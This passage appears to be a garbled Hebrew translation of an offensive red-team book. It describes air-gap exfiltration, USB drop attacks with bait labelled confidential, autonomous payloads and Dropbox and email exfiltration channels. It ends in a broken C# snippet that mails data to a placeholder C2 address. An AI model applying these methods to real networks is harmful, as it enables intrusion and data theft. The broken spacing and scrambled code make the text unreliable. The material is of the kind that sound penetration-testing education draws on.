‫פר ק זה הציג ט כנו לוגיות ומו שגים חד שים המדגימים את היתרון ש ל גי שה פיזית ל טוו ח‬
‫קצר אפי לו למי קום היעד‪ .‬לעו לם א ל תני ח שתנו חת הא ב ט חה ש ל ארגוןיעד תואמת את‬
‫א ב ט חת הנתונים שהם מנ סים להגן ע ליהם‪ .‬שירות מ ש טרתי הוא גוף צי בורי ו כ כזה אין לו‬
‫ת קצי ב א ב ט חה ש ל בנ ק או תאגיד גדו ל‪ .‬כו בע ש חורי כו ל היה למ כור את הנתונים שה שגנו‬
‫לפ שע המאורגן תמורת אגורהיפה‪ .‬אפי לו המי קום והאופי ש ל כ ל כ לי הנ ש ק במ חוז היה‬
‫זה ב‪ ,‬ש לא לד בר ע ל פר טים הנוגעים למודיעים‪.‬‬
‫‪ 1.‬ראית איך לה שתמ ש ‪ -Raspberry Pi‬ב כדי לר חר ח תנועה ו להיות ח ל ק מ‪a-‬‬
‫פתרון רי שום מפת חות‪ .‬ק ח את זה צעד א חד קדימה ו ש קו ל כיצדיית כן שניתן‬
‫לה שתמ ש ‪ -keylogger‬כ ‪ -Pi‬ב חומרה וגם כ סו כן ‪ C2‬ו כיצד ניתן לה שיג זאת‬
‫בדי ס קר טיות‪.‬‬
‫‪2.‬צוריי שום ‪ HTML‬מתוך מ ח ש בה ע ל ארגוןיעד ספציפי‪.‬‬
‫ש קו ל מיתוג ו לוגו‪.‬‬
‫‪ 3.‬לאור האופן ש בו קו בצי ‪DLL‬הות קפו בפר ק זה ע ל מנת לה ס לים את ההר שאות‪,‬‬
‫האם תו כ ל לה שתמ ש ב ט כני קה דומה כדי לת קוף שירותים?‬
‫פר ק ‪7‬‬
‫מ ש ח קי מ ל חמה‬
‫לפני כמה שנים‪ ,‬בנ ק בי ק ש ממני ל בצע מ ספר בדי קות מו ל א חד מהמפ קדות ש להם‬
‫בהו לנד‪ .‬זה היה מ שהו שהם ע שו כ ל שנה והור כ ב ממגוון בדי קות‪ :‬בניית בי קורות‪,‬‬
‫ת שתית פנימית ו בדי קות אפ לי קציות אינ טרנ ט ‪ -‬שום ד בר מעניין במיו חד‪ .‬בדי קה א חת‬
‫שהם רצו ל בצע הייתה בדי קת חי לוץ נתונים‪ ,‬כ לומר ל ק בוע כמה ק ל למ שתמ ש להוציא‬
‫נתונים קרי טיים מה בניין לא חר שהו שגו‪ .‬בתר חי ש ה ספציפי הזה‪ ,‬זה היה ק ל מאוד‬
‫מ כיוון ש ל כ ל מ שתמ ש היו אינ טרנ ט ל שו ל חן הע בודה‪ ,‬דואר א ל ק טרוני‪ ,‬כונני ‪USB‬‬
‫עו בדים‪ ,‬גי שה לדוא" ל פנימי ו כן ה לאה‪ ,‬א ב ל זה גרם לי ל ח שו ב ע ל תר חי שים שייפר סו‬
‫בהר בהיותר מאו חריותר‪ ,‬עוד בדי קות ר לוונ טיות‪ .‬הה ש ל כה העי קרית מ כך היא ש כדאי‬
‫לערוך בדי קות סינון ר ק ב ס בי בה מאו ב ט חת אמיתית ש בה המ שתמ שים ש לך נתונים‬
‫למידת אמון מוג ב לת‪ .‬ע ל זה עו ס ק הפר ק הזה‪.‬‬
‫‪ SIPRNET‬וה כ ב לים הדיפ לומ טים‬

‫ס קנד ל‬
‫א חרי ה‪ 11-‬ב ספ טמ בר נ שא לו הר בה שא לות והר בה אצ בעות הופנו‪ ,‬במיו חד כ לפי‬

‫סו כנויות ביון ש לא סי כ לו את הת קיפות למרות שידוע שא ל‪ -‬קאעידה מת כנן לת קוף‬
‫את ארצות ה ברית עם מ טו סי נו סעים‪ .‬בעיה מר כזית שזוהתה הייתה היעדר שיתוף‬
‫מודיעין בין זרועות שונות ש ל א כיפת ה חו ק‪ ,‬הצ בא וארגוני אי סוף מודיעין‪.‬‬
‫ח ל ק מהפתרון ל בעיה זו היה פיתו ח ר שת מ ח ש בים מאו ב ט חת ב שם ‪)SIPRNet‬או‬

‫‪Secret Internet Protocol Router Network). SIPRNet‬נוצר כדי ל טפ ל‬
‫בנתונים עד ו כו ל ל ‪ SECRET‬בעוד שמער כות א חרות שימ שו ל טיפו ל בנתוני ‪SIPRNet‬‬
‫‪TOP SECRET.‬תו כנן כך שניתןיהיה ל שתף מידע מ סווג ב ק לות ו באופן תיאור טי‬
‫מאו ב ט ח בין מ שרד ההגנה ומ שרד ה חוץ‪.‬‬
‫עד ‪2010‬היו ‪ -SIPRNet‬להר בהיותר מ שתמ שים‪ ,‬ש כן הגי שה הור ח בה ל בע לות‬
‫ברית בתו כנית ‪ )Five-Eyes‬ברי טניה‪ ,‬קנדה‪ ,‬או ס טר ליה וניו זי לנד(‪ .‬א חד מאותם‬
‫מ שתמ שים היה מנת ח מודיעין זו טר ב שם‬
‫ניו זי לנד(‪ .‬א חד מאותם מ שתמ שים היה מנת ח מודיעין זו טר ב שם בראד לי מאנינג‪,‬‬
‫ש באמצעות הגי שה ש לו‪ ,‬הד ליף ח ל קים עצומים ש ל נתונים לווי קי לי ק ס‪.‬‬
‫כ ל זה היה כמו בן ב חד שות‪ ,‬א ב ל ההנ חה כאן היא שמנינג סינן את הנתונים ע ל‬
‫ת ק לי טורים מ חופ שים לת ק לי טורי ליידי גאגא‪ .‬כמע ט ו לא הייתה נעי לת מאר ח ע ל מ סופי‬
‫‪ SIPRNet‬עצמם מ כיוון שהם לא היו מ חו ברים לר שתות א חרות ונ ח ש בו מאו ב ט חים‪.‬‬
‫לד ברי מאנינג‪ ,‬אנ לי ס טים האזינו באופן ק בוע למוזי קה במ סופי ‪ SIPRNet‬כך שזה לא‬
‫היה ח שוד‪.‬‬
‫נ קודה ח שו בה נו ספת היא שמ סוף ‪SIPRNet‬י כו ל להריץ את ‪ Windows,‬בעוד שמ סופים‬

‫המ חו ברים ל‪ TENASN-‬או ‪JWICS‬היו בדרך כ ל ל ת חנות ע בודה ש ל ‪Sun.‬‬
‫המ טרה במפגע המ סוים הזה הייתה ר שת מ ח ש בים צ באית ב ברי טניה‪ .‬לר שת זו לא הייתה‬
‫קי שוריות לאינ טרנ ט והיא הייתה מופרדת פיזית מת שתיות מ ח ש בים א חרות ב בניין‪ .‬היה מ ספר‬
‫מצומצם ש ל מ סופים וא ליהם ניתן היה לג שת ר ק ל שו טר עם אי שורי א ב ט חה ו כר טי ס ח כם‪.‬‬
‫ערמומי‪.‬‬
‫ק ב לת גי שה לר שת הייתה בעיה א חת‪ ,‬ש חרור הנתונים היה מ שהו א חר לגמרי‪ .‬לא הייתה שום‬
‫סי כוי שהייתי מו כן לערוך בדי קת חדירה פיזית מו ל ב סי ס צ באי )האנ קדו טה המ שע שעת למ טה‬
‫מפר טת למה‪ ,‬במונ חים לא ברורים( ו לא הייתה שום דרך שנו כ ל לפרוץ לת שתית צ באית‬
‫מאו ב ט חת מהאינ טרנ ט‪ .‬או לי היו כמהיציאות גי שה א חרות איפ שהו או סוג א חר ש ל קי שוריות‬
‫ר שת סמו כה‪ ,‬א ב ל שום ד בר שאנ חנו הו ל כים ל ק ב ל א ליו גי שה ב כ ל סוג מדיד ש ל מ סגרת זמן‪,‬‬
‫ו בוודאי ש לא היה לנו שום סוג ש ל מפר טי ר שת לע בוד איתו ‪ .‬ראה איור ‪7.1.‬‬
‫איור ‪ 7.1:‬מר כז ת ק שורת מאו ב ט ח בארה" ב מדור‪.‬‬

‫המת קפה תצ טרך לה שתמ ש בר כי ב פיזי כ ל שהו כדי ל ספ ק את המ טען‪ .‬ת ק לי טור‪,‬‬
‫או לי? לא מ ספי ק דימיוני‪ .‬גם אם ניתן היה ל ש כנע את המ טרה לה כני ס את הדי ס ק‬
‫למ ח ש ב‪ ,‬זה היה צריך להיות המ ח ש ב הנ כון‪ ,‬ואז עדיין הייתה ה בעיה ש ל חי לוץ‬
‫הנתונים‪ .‬ב סעיף "המת קפה" בהמ שך פר ק זה‪ ,‬אני מפר ט כיצד בדיו ק התג ברו ע ל‬
‫ה בעיות ה ל לו; עם זאת‪ ,‬ד בר רא שון‪ .‬אני רוצה לדון ברעיונות ו ב ט כני קות שנדונו בתור‬
‫ו ק טורים פו טנציא ליים גם לפרי סת מ טען וגם ל‪ 2C-‬בעת ת כנון המ שימה‪ .‬בעוד שרו ב‬
‫הרעיונות ה ל לו נד חו ע בור המ בצע המ סוים הזה‪ ,‬התרגי ל היה אינפורמ טי בי ביותר‬
‫ע בור הת ק שרויות כא לה עתידיות ומ ביא למ ח קר בע ל ערך‪.‬‬
‫הרא שון ש לי )ו כמע ט הא חרון(‬

‫בדי קת חדירה פיזית‬
‫היית צריך לציין עד ע כ שיו שאני אוה ב את האנ קדו טות ה ק טנות ש לי‪ ,‬א ב ל הן תמיד‬
‫מגיעות עם שיעור‪ .‬כיוון א ליי א קד ח פעמיים בדיו ק ב חיי‪ .‬הפעם הרא שונה הייתה‬
‫ב שנת ‪ 1999‬בהו לנד ‪-‬אי ה בנה ש ל המ ש טרה לא חר ש ח ברה ש לי ה שאי לה את‬
‫המ כונית ש לי לא חד מ ח בריה הע בריינים בזמן שהייתי ב חופ שה‪ .‬זה לא היה מפ חיד‬
‫במיו חד מ כיוון ש למ ש טרה ההו לנדיתי ש ה כ שרה מוג ב לת בנ ש ק חם‪" :‬זה ה סוף‬
‫שיורה את ה כדורים‪ ,‬הימנע מההד ק במ קרה שאתהיורה ב טעות במי שהו ו‪ ...‬טו ב‬
‫כנראה שה כי טו ב פ שו ט לא להעמי ס את הד בר‪".‬‬
‫הפעם ה שנייה הייתה לא פ חות ממפ חידה‪ .‬התנד בתי ל בצע מ ב חן ע ט פיזי ש ל‬
‫ב סי ס ‪ RAF‬באנג ליה פ חות מ חוד שיים לא חר ה‪ 11-‬ב ספ טמ בר‪.‬‬
‫ה"תו כנית" ש לי כ ל לה ל טפ ס ע ל גדר ו ל קוות שאף א חד לאיראה אותי‪.‬‬
‫ד קות לא חר מ כן ה סת כ לתי ע ל ה קצה הע ס קי ש ל רו בה סער ‪ L85‬שני שא ע לידי‬
‫מי שהו שנראה כ בן ‪ 14‬ורעד מפ חד‪ .‬זה היה מפ חיד‪ .‬מצאתי את עצמי אומר ד ברים‬
‫כמו‪ " ,‬ב ט ח‪ .‬בה ח ל ט‪ ,‬אין בעיה‪ .‬מה שתרצה‪".‬‬
‫הנ קודה ש לי היא שמעו לם לא הייתי צריך להיות שם והיו דר כים הר בהיותר טו בות‬
‫שאפ שר היה ל בצע את המ שימה הזו עם קצת מ ח ש בה ודמיון‪ .‬א ב ל ה כי ח שו ב‪ ,‬זה‬
‫לא שי קף במדוי ק מת קפה אמיתית והיה בז בוז זמן ש ל כו לם‪.‬‬
‫מ סירת מ טען ח ל ק ‪VII: USB Shotgun Attack‬‬

‫מה אם‪ ,‬כמו בדוגמה ה קודמת‪ ,‬אין לך ציפייה ס בירה ל ספ ק מ טען באמצעים‬
‫מ סורתיים? ה ס בי בה היא א ב ט חה ג בוהה ואין אמצעי כני סה או פ שרה מ שניים שאתה‬
‫י כו ל לנצ ל )ראה פר ק ‪ 8,‬סעיף "מו שגים מת קדמים בהנד סה ח ברתית"(‪ .‬ה ס קרנות‬
‫הרגה את ה חתו ל‪ ,‬ו למרות שאף חתו ל לא נפגע ב כתי בת ה ספר הזה‪,‬י ש סי בה‬
‫שהאמרה הזו היא ק לי שאה‪.‬‬
‫מ ח קר מדי סון גור קה‬
‫ב שנת ‪ 2009,‬ח ברת א ב ט חה הו לנדית ביצעה מ ח קר כדי ל ק בוע עד כמה ארגונים‬

‫פגיעים ל סגנון ההת קפה הזה‪ .‬הם ע שו זאת ע לידי טעינת כונני ‪ USB‬במ טען ב לתי‬
‫מזי ק וה שארתם במ קומות שונים‪ ,‬צי בוריים או א חרים‪ ,‬בדרך כ ל ל ב קר בתיעדים‬
‫בע לי ערך ג בוה‪.‬‬
‫אם מי שהו חי בר את ה כונן למ ח ש ב עם גי שה לאינ טרנ ט‪ ,‬המ טעןית ק שר ה ביתה‪,‬‬
‫יציין כתו בות ‪ IP‬ו כן ה לאה כדי שניתןיהיה לזהות את הארגון‪ .‬המ ח קר מצא כי‬
‫בנ קים גדו לים‪ ,‬מפ לגות פו לי טיות‪ ,‬שגרירות זרה וא חרים ע שו זאת‪ .‬לו המ טען היה‬
‫חי‪ ,‬הה ש ל כות הא ב ט חה ברורות‪.‬‬
‫מדיה ‪USB‬‬
‫פעם‪ ,‬פונ קציונ ליות ההפע לה האו טומ טית ש ל ‪Windows‬הייתה‪ ,‬כ ברירת מ חד ל‪,‬‬
‫מ בצעת כ ל ד בר שה כנ סת ל כונן די ס ק אופ טי בהת ב ס ס ע ל העיצו ב ש ל מפת ח התו כנה‪.‬‬
‫מיותר לציין שזה היווה פגיעות א ב ט חה כ ש לעצמה‪ .‬היו גם דר כים ל ש כנע את‬
‫‪ Windows‬ש כונן ‪USB‬הוא כונן אופ טי ו לה שתמ ש בא ס טר טגיה דומה כדי להפעי ל‬
‫תו כנות זדוניות במ ח ש ב ש ל ה קור בן‪ .‬ה ח ל ‪-Windows 7,‬מ מער כת ההפע לה אינה‬
‫תומ כת עוד בפונ קציונ ליות ‪ AutoRun‬ע בור מדיה נ ש לפת שאינה אופ טית‪ .‬הפע לה‬
‫או טומ טית עדיין תע בוד ע ל ת ק לי טורים ‪-DVD‬ו) למ שתמ ש תינתן האפ שרות להפעי ל‬
‫את ה קוד‪ ,‬א ב ל זה לאי קרה או טומ טית(; עם זאת‪ ,‬זה כ בר לאיע בוד ב כ ל ל ע בור כונני‬
‫‪USB,‬תיאור טית הופך את הת קפות ההנד סה ה ח ברתית ל ק שות הר בהיותר‪.‬‬
‫גי שהיעי לה לו ק טורים להת קפות ‪USB‬האם זה מדאיג אותנו? אף לא טיפה‪ .‬כפי‬
‫שדי ברתי בע בר ב‪VBS/ABV-‬‬
‫הת קפות בפר ק ‪2 ,‬אני לא אוה ב את ה שימו ש ב שגרות או טומ טיות כדי לה שיג ביצוע קוד ‪-‬‬
‫זה ח שוד מ ט בעו‪ .‬הת קפת ההנד סה ה ח ברתית ש לך צרי כה להיות מ ספי ק א לגנ טית ומרת קת‬
‫כדי ל ש כנע את ה קור בן ל ל חוץ ע ל כ ל מה שתרצה‪ .‬ז כור‪ ,‬כ ל קוד וו ק טור הת קפה שאתה‬
‫בו חר לפרו ס באמצעות הת קפת ‪USB,‬הם לא נמ סרים ע לידי ל קו ח דוא" ל או דפדפן‬
‫אינ טרנ ט או כ ל נתי ב הת קפה ברור א חר ‪-‬הוא מהימן מ כיוון שהמ טרה חי ברה את המ כ שיר‬
‫לת חנת הע בודה ש לו‪ .‬מרצונם ה חופ שי‪.‬‬
‫זוהי דוגמה מצוינת לאופן ש בו ניתן לה שתמ ש בהת קפתיי שום ‪ )HTML‬שנדונה בדוגמה‬
‫ה קודמת( לה שפעה ר בה‪ .‬בנו סף‪Windows Scripting Host ,‬או ‪ PowerShell‬מייצרים‬
‫ו ק טורי הת קפה מצוינים‪ ,‬או שאתהי כו ל לה שתמ ש ביי שומון ‪ Java‬חתום אם אינך ב טו ח‬
‫באיזו פ ל טפורמה אתה עומד להית ק ל )או אם אתה מצפה למ ספר פ ל טפורמות ורוצה לפגוע‬
‫בצורה מהימנה כ ל מה שאתה נת ק ל(‪ .‬א ל ת ש כ ח את המועדף הי שן הזה ‪-‬המא קרו ש ל‬
‫‪Microsoft Office.‬‬
‫ל ח לופין‪,‬יית כן שתרצה לפרו סיותר מא חת מהת קפות א לו ע ל אותה מדיה‪ .‬זו לא בעיית‬
‫מ סירה חד‪-‬פעמית ש בה אתה נת ק ל בדרך כ ל ל בעת ת קיפת ו ק טורים א חרים‪ .‬עם זאת‪ ,‬כמו‬
‫תמיד‪ ,‬שימו ל ב לאנ טי וירו ס‪ .‬איך לה כני ס את די ס קי ‪-USB‬ה למ ח ש ב היעד ש לך? במי לותיו‬
‫ש ל האן סו לו‪ " ,‬טו ב‪ ,‬זה ה טרי ק האמיתי‪ ,‬לא?"‬
‫ת קיפת ארגונים באמצעות עומ סי ‪"USB:‬ה טרויאני ההפוך‬

‫ִגי ׁ ָשה"‬
‫ניצו ל מ טרה באמצעות גי שת מ טען ‪ USB‬מצריך פתרון בעיה מ שמעותית מ ל בד הפר טים‬
‫ה ט כניים ‪ -‬כ לומר להע ביר את המ טען לידיים ש ל המ טרה בצורה שאינה מ ח שידה ו לגרום‬
‫להם ל בצע אותו‪.‬‬
‫ש חזור נתונים היא בעיה נפרדת והיא ת כו סה לעומ ק ב סעיף ה בא‪.‬‬
‫במ קרים ש בהם אתה צריך לת קוף מת קני א ב ט חה נמו כיםיותר‪ ,‬ניתן לה שאיר כונני אצ בע‬
‫במ קומות ש בהם מ טרה ע שויה לצפות למצוא אותם באופן ס ביר ואז לה סי ק שהם הו באו‬
‫ב טעות במ קומם‪ ,‬כגון‪:‬‬
‫אזורי ק ב לה‬
‫מע ליות‬
‫חניונים מ קומות ש בהם מתא ספים מע שנים )א לה מ קומות מצוינים לה שאיר כונני ‪USB,‬‬
‫מ כיוון שאנ שים מני חים לעתים קרו בות את מה שהם נו שאים כדי לתפו ס את הע שן ש להם‪(.‬‬
‫קצת מאמץ מר חי ק ל כת‪ .‬מפת חות ‪ USB,‬כמו תגי ‪ VPN,‬לו ב שים לעתים קרו בות ע ל שרוך‬
‫הזיהוי ש ל עו בד‪ .‬הי כו לת ל ח קות את המראה והת חו שה הארגונית ש ל‬
‫שרוך תעודת זהות ש ל העו בד‪ .‬הי כו לת ל ח קות את המראה והת חו שה הארגונית ש ל‬
‫הד בר עו שה דרך ארו כה‪.‬‬
‫קצת הנד סה ח ברתית‬

‫זו כרים כ בר בפר ק ‪ 1‬כ שדי ברתי ע ל ה שפעה ע ל הרג שות ש ל המ שתמ ש כדי לגרום להם‬
‫לפתו ח ק בצים מצורפים? אותה ע ס קה‪ .‬אם נראה כי כונן ‪-USB,‬האו כ ל מדיה שת ב חר‬
‫לה שתמ ש בה‪ ,‬מ כי ל מידע סודי שע שוי להועי ל לצופה )או ע לו ל‪ ,‬באמצעות אי צפייה‪,‬‬
‫להזי ק למ שתמ ש(‪,‬י ש לך את הת קפת ההנד סה ה ח ברתית ה חז קה ביותר האפ שרית‪.‬‬
‫סימון פרי טים כ סודיים או מוג ב לים בדרך א חרת היא דרך טו בה ל ל כת‪ .‬התר חי ש הגרוע‬
‫ביותר אם עו בד או סף אותו הוא שהואיוע בר לא ב ט חה או ל ק ב לה‪ ,‬א שר בוודאיירצה‬
‫לצפות בת כנים כדי לראות את מי להעני ש ע ל כי ש לונם ה בו טה בציות למדיניות‬
‫הא ב ט חה ש ל הארגון‪.‬‬
‫פי קוד ו ב קרה ח ל ק ‪ VII:‬מת קדם‬

‫חי לוץ נתונים או טונומי‬
‫יהיו מ קרים במה לך מ שימות בהם תצ טרך לת קוף ס בי בות א ב ט חה ג בוהות ש בהן אמצעים‬
‫מ סורתיים ש ל פי קוד ו ב קרה מ בו ס סים לאיהיו מתאימים ו לא מע שיים‪ .‬אני מת כוון ל שימו ש‬
‫ב סוג כ ל שהו ש ל ניהו ל מפג שים אינ טרא ק טי בי די ס קר טי או בד לת א חורית‪ .‬כפי שמתואר‬
‫ב סעיף מ סירת מ טען‪ ,‬לפעמים לא ניתן לפרו ס ח בי לות ת קיפה באמצעים מ סורתיים‪ .‬ש חזור‬
‫נתונים לא חר מ סירת מ טעןי כו ל להיות אפי לויותר מאתגר‪ .‬עם זאת‪ ,‬למרות שר שתיעד‬
‫ע שויה להיות נעו לה במידה מאיימת‪ ,‬תמידיהיו נ קודותיציאה‪ .‬תפ קידך כתו קף בנ סי בות‬
‫א לה הוא כפו ל‪:‬‬
‫בנה מ טען עם מ שימה מאוד ספציפית ל ביצוע‪ .‬כפי שצוין‪ ,‬לא מדו בר בה קמת ת שתית‬
‫‪C2‬א לא ב חיפו ש א חר סוגים ספציפיים ש ל ק בצים או ב ל חיצת ה ק שות או באי סוף‬
‫מודיעין ע ל אנ שייעד ו כדומה‪.‬‬
‫ל ספ ק למ טען מ ספי ק או טונומיה ואינ ט ליגנציה כדי להיות מ סוג ל ל ק בוע אמצעי קיימא‬
‫ש ל חי לוץ נתונים ל לא צורך בת שתית ‪ C2‬שתנ חה אותו‪.‬‬
‫למה אנ חנו מת כוונים כ שאנ חנו מד ברים ע ל "או טונומיה"‬

‫זה המ קום ש בו ד בריםי כו לים להיות קצת מ סו ב כים‪ .‬כדי שהמ טען ש לךיהיה או טונומי‪ ,‬הוא‬
‫צריך להיות מ סוג ל ל ק ב ל ה ח ל טות מ ש לו לג בי התגנ בות‪ ,‬סיור ויציאה‪ ,‬וה כ ל ל לא הדר כה‬
‫אנו שית‪ .‬ברור ש כ כ ל שאתהי כו ל לע שותיותר סי קור בעצמך לפני המ שימה‪ ,‬המ טעןיידר ש‬
‫פ חות לע שות את עצמו‪ ,‬א ב ל במ קרה זה נני ח ש לאית כן מ ח קר קודם ע ל פעו לתה הפנימית‬
‫ש ל הר שת לפני הפרי סה הרא שונית‪.‬‬
‫אם אינךיודע ד בר ע ל פעו לתה הפנימית ש ל ר שתיעד‪ ,‬א ב ל אתהיודע שאין גי שה‬
‫לאינ טרנ ט ב כני סה אויציאה והאתר מאו ב ט ח פיזית )אנ חנו לא נ כנ סים ל לא ס בירות ג בוהה‬
‫ש לירי(‪ ,‬אז זה מאו ב ט ח ל ח לו טין‪,‬ימין?‬
‫ימין? אם קראתם עד כאן‪ ,‬אני מני ח שאתם צו ח קים ע כ שיו ב קו ל )או לפ חות נהנים מצ ח קו ק‬
‫ש ק ט(‪ .‬ב סי כון ל חזור ע ל עצמי‪ ,‬שום ד בר לא‬
‫ל ב ט ח‪.‬‬
‫אמצעייציאה‬
‫באופן אידיא לי‪ ,‬ליעד ש לךיהיה אינ טרנ ט א ל שו ל חן הע בודה‪,‬י שירות או באמצעות פרו ק סי‬
‫באופן אידיא לי‪ ,‬למ טרה ש לךיהיה אינ טרנ ט ל שו ל חן הע בודה‪,‬י שירות או דרך שרת‬
‫פרו ק סי מ סוג כ ל שהו‪ ,‬מה ש כמו בןיהפוךיציאה מ כ ל סוג ל טריוויא לית‪.‬‬
‫זה כו סה בצורה מ ספ קת בפר קים ה קודמים‪ .‬ב ח ל ק זה‪ ,‬אני רוצה ל ח קור שי טות פ חות‬
‫ברורות ואין לי שום כוונה לה ק ל ע ל עצמי‪.‬‬
‫מדיה פיזית בתר חי ש ש בו למער כת אין ק שר לעו לם ה חיצון‪ ,‬כדאי ליצור מ טען שי כו ל‬
‫לזהות אם מדיה נ ש לפת ) כגון כונני אצ בע( מ חו ברים למער כת‪ .‬במ קרה כזה‪ ,‬ניתן לארוז‬
‫נתונייעד ליציאה ל כונן ) לדוגמה‪ ,‬כ קו בץ ‪ ZIP‬מוצפן או שווה ערך( ו לה טמיע אותם‬
‫בפורמ ט פ סאודו‪-‬הפע לה כ ל שהו ) כגוןיי שום ‪ HTML‬שנדון קודם ל כן או אפי לו נו שא‬
‫מא קרו מ סמך מ שרדי(‪ .‬הנימו ק כאן הוא שהמ כ שיר‪ ,‬מ ט בעו‪ ,‬הוא נייד‪ ,‬כך שהוא ע שוי‬
‫להיות מ חו בר בעתיד לר שת ) כגון הגדרת ‪ WiFi‬ביתית( שיהיו בה קודי חי בור מוג ב לים‬
‫הר בה פ חות‪.‬י ש לציין שמ ספר המ שתנים ה חיו ביים הדרו שים להצ ל חת ההת קפה הזו‬
‫הופך אותה למ שהו ש ל " ש לום מרי"‪.‬‬
‫עם זאת‪,‬י שנן ט כני קות מת קדמותיותר שי כו לות לע בוד במ קרים ספציפיים‪.‬‬
‫מת קפה מ סוימת א חת שהודגמה ‪ -Black Hat‬ב ב לא ס וגא ס ב שנת ‪ )2014‬שהוצגה ע ל‬
‫ידי )‪-Jakob Lell‬ו ‪ Karsten Nohl‬כו ל לת מ ק ל ‪USB‬הפוע ל כ ש לו שה הת קנים נפרדים ‪-‬‬
‫שני כונני אצ בע ומ ק לדת‪ .‬כא שר המ כ שיר מ חו בר לרא שונה למ ח ש ב ומזוהה ע לידי‬
‫מער כת ההפע לה‪ ,‬הוא פוע ל כהת קן א ח סון רגי ל‪ .‬עם זאת‪ ,‬כא שר המ ח ש ב מופע ל‬
‫מ חד ש וההת קן מזהה שהוא מד בר עם ‪-BIOS,‬ההוא מד לי ק את הת קן הא ח סון הנ סתר‬
‫ומדמה את המ ק לדת‪.‬‬
‫מ שמ ש כמ ק לדת‪ ,‬המ כ שיר שו ל ח את ל חיצות ה כפתורים הנ חוצות כדי להע לות את‬
‫תפרי ט האת חו ל ומפעי ל מער כת לינו ק ס מינימ לית מה כונן הנ סתר‪.‬‬
‫לא חר מ כן‪ ,‬מער כת לינו ק ס מד בי קה את טוען האת חו ל ש ל כונן הדי ס ק ה ק שי ח ש ל‬
‫המ ח ש ב‪ ,‬ו בעצם פוע לת כמו וירו ס את חו ל‪.‬‬
‫מדו בר בד ברים ש ל הדור ה בא ואין לי מ קום לדון בהם בפירו ט כאן‪ ,‬א ב ל אתה בה ח ל ט‬
‫י כו ל לצפות לראות הת קפות נו ספות מ סוג זה בעתיד‪.‬‬
‫איתור נ קודות ש ליציאה מר שת היא אמנות )וא כן תרגי לייעוץ( בפני עצמה‪.‬‬
‫דרופ בו ק ס‬
‫אני צ בוע מו ח ל ט כ שזה מגיע לדרופ בו ק ס )ו ט כנו לוגיות נ לוות(‪ ,‬כמוני‬
‫אני צ בוע מו ח ל ט ב כ ל הנוגע ‪ -Dropbox‬ל)ו ט כנו לוגיות ק שורות(‪ ,‬מ כיוון שאני מוצא את זה שימו שי להפ ליא‬
‫ל סנ כרן מ סמ כים במ כ שירים שונים וזו דרך מצוינת ל שתף מ סמ כים‪ ,‬בין אם דרך ח ש בונות ‪Dropbox‬או‬
‫באמצעות קי שורי ‪ HTTP‬עם א לה שאינם ב‪ -‬ה חז קת ח ש בון‪ .‬מ כיוון שדרופ בו ק ס עצמה אינה מ בצעת סרי קת‬
‫תו כנות זדוניות‪ ,‬זוי כו לה להיות ט כנו לוגיה מ סו כנת לאפ שר במ קום הע בודה‪.‬‬
‫ל כ ל הפ חות‪ ,‬אני תמיד מייעץ ל ל קו חות ש לי לפ ק ח ע ל זה באמצעות ‪NIDS‬או ל ח סום אותו ל ח לו טין‪ .‬כדי‬
‫ליצור אנ לוגיה מהירה‪ ,‬כא שר מ שתפים את כת ב היד הזה עם המוציא לאור‪ ,‬הוא היה נ ח סם ע לידי א ב ט חת‬
‫הג בו ל ש ל וויי לי פ שו ט בג ל ל ש סור ק ‪-AV‬ה ראה מ חרוזות מ סוימות במ סמך‪ .‬זה נפתר ע לידי ה כנ סת‬
‫המ סמ כים ‪ -Dropbox‬ל ו שיתוף קי שור ‪HTTP.‬אז מנ קודת המ ב ט ש לנו‪ ,‬אפ שר לה שתמ ש ‪ -Dropbox‬ב‬
‫כאמצעי לפרי סת מ טענים ו ל חיצהי שר דרך א ב ט חת הג בו ל ש ל הארגון‪ .‬זהי כו ל להיות שימו שי כאמצעי‬
‫ל סי לו ק נתונים‪ .‬ה ט כנו לוגיה מ שתמ שת ‪-HTTPS‬ו ‪ -HTTP‬ב כדי ל שאת נתונים כ ל עודי ש למ שתמ ש נראות‬
‫ב סי סית ש ל האינ טרנ ט‪ .‬הו ספת קוד לה סתננות ל‪ 2C-‬ש לך הו ל כת להיות טריוויא לית‪ ,‬במיו חד מ כיוון שי ש‬
‫ספריות ש ל צד ש לי שי לע שות בדיו ק את זה ע בור מ ספר שפות שונות‪:‬‬
‫‪https://www.dropbox.com/developers-v1/core/sdks/other‬‬
‫אימיי ל‬
‫ב קיצור‪ ,‬אתהי כו ל לה שתמ ש ב שרתי הדואר הא ל ק טרוני הפנימיים ש ל היעד ש לך כאמצעי ל חי לוץ נתונים‪,‬‬
‫למרות שזה לא נתי ב שאני בה כר ח ממ ליץ ע ליו‪ .‬זה פ שו ט בג ל ל ש שרת הדואר מהווה מו קד לזיהוי איומים‪,‬‬
‫בין אם זה דואר ז ב ל‪ ,‬הת קפות דיוג‪ ,‬ח סימת ק בצים מצורפים‪ ,‬סרי קת וירו סים או כ ל ד בר א חר‪ .‬כתוצאה‬
‫מ כך‪,‬י ש ט כנו לוגיה בוגרת מאוד שצופה במה שנ כנ ס אויוצא מהר שת דרך שרת הדואר‪ .‬עם זאת‪ ,‬אפ שר‬
‫לגרום ל סו כן ‪ C2‬ש לך לזהות את ה כתו בת הפנימית ש ל שרת מ ש לו ח הדואר ש ל היעד ו לנ סות ל ש לו ח ק בצים‬
‫מצורפים דרך ‪)SMTP‬או כ ל פרו טו קו לים שנמצאים ב שימו ש(‪.‬‬
‫גי שה הר בהיותר טו בה היא לזהות באיזה ל קו ח דואר היעד מ שתמ ש ו לה שתמ ש ב‪ API -‬ש ל ט כנו לוגיה זו‬
‫כאמצעייציאה‪ .‬ברור שזהיהיה שונה ע בור כ ל ל קו ח‪ ,‬אז עיין בתיעוד הר לוונ טי‪ .‬ע בור ‪Microsoft Outlook‬‬
‫) שתת ק לו בו ברו ב המ קרים(‪ ,‬זה טריוויא לי‪ .‬ה קוד ה באיע שה בדיו ק את זה‪ .‬למען ה בהירות )וה כיף ש ל לוודא‬
‫ש כ ל ט כנו לוגיה שאנו מ שתמ שים בה לרעה היא ש ל מי קרו סופ ט(‪ ,‬זה כתו ב ב‪:#C-‬‬
‫= ‪Microsoft.Office.Interop.Outlook.Application c2App‬‬
‫;)(‪Microsoft.Office.Interop.Outlook.Application‬‬
‫= ‪Microsoft.Office.Interop.Outlook.MailItem c2Mail‬‬
‫;"" = ‪c2Mail.To = "c2user@c2domain.com"; c2Mail.CC‬‬
‫;)‪(MailItem)c2App.CreateItem(OlItemType.c2MailItem‬‬
‫= ‪"c2Mail.Subject‬תו כן‬
